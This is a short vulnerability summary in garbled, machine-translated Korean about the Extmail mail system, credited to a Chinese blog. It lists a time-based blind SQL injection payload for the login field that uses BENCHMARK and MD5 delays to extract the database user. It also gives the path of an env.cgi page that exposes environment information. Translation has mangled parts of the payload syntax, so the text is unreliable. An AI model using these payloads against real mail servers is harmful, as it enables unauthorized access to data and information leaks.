응용 프로그램 보안 - 메일 시스템 - Extmail - 취약점 요약

리셉션 SQL 주입

페이로드 (사출 자명 지연이있다) 
ADMIN ' 는 AND IF (ASCII (문자열 (사용자 (), 1,1))> (104), 벤치 마크 (200, MD5 (0x72696e67))는 ,. 1) % 23은

 

민감한 정보의 수신 공개

페이로드 : 
HTTP : // xxx.xxx.com/extmail/cgi/env.cgi

 

추천

출처www.cnblogs.com/AtesetEnginner/p/12329522.html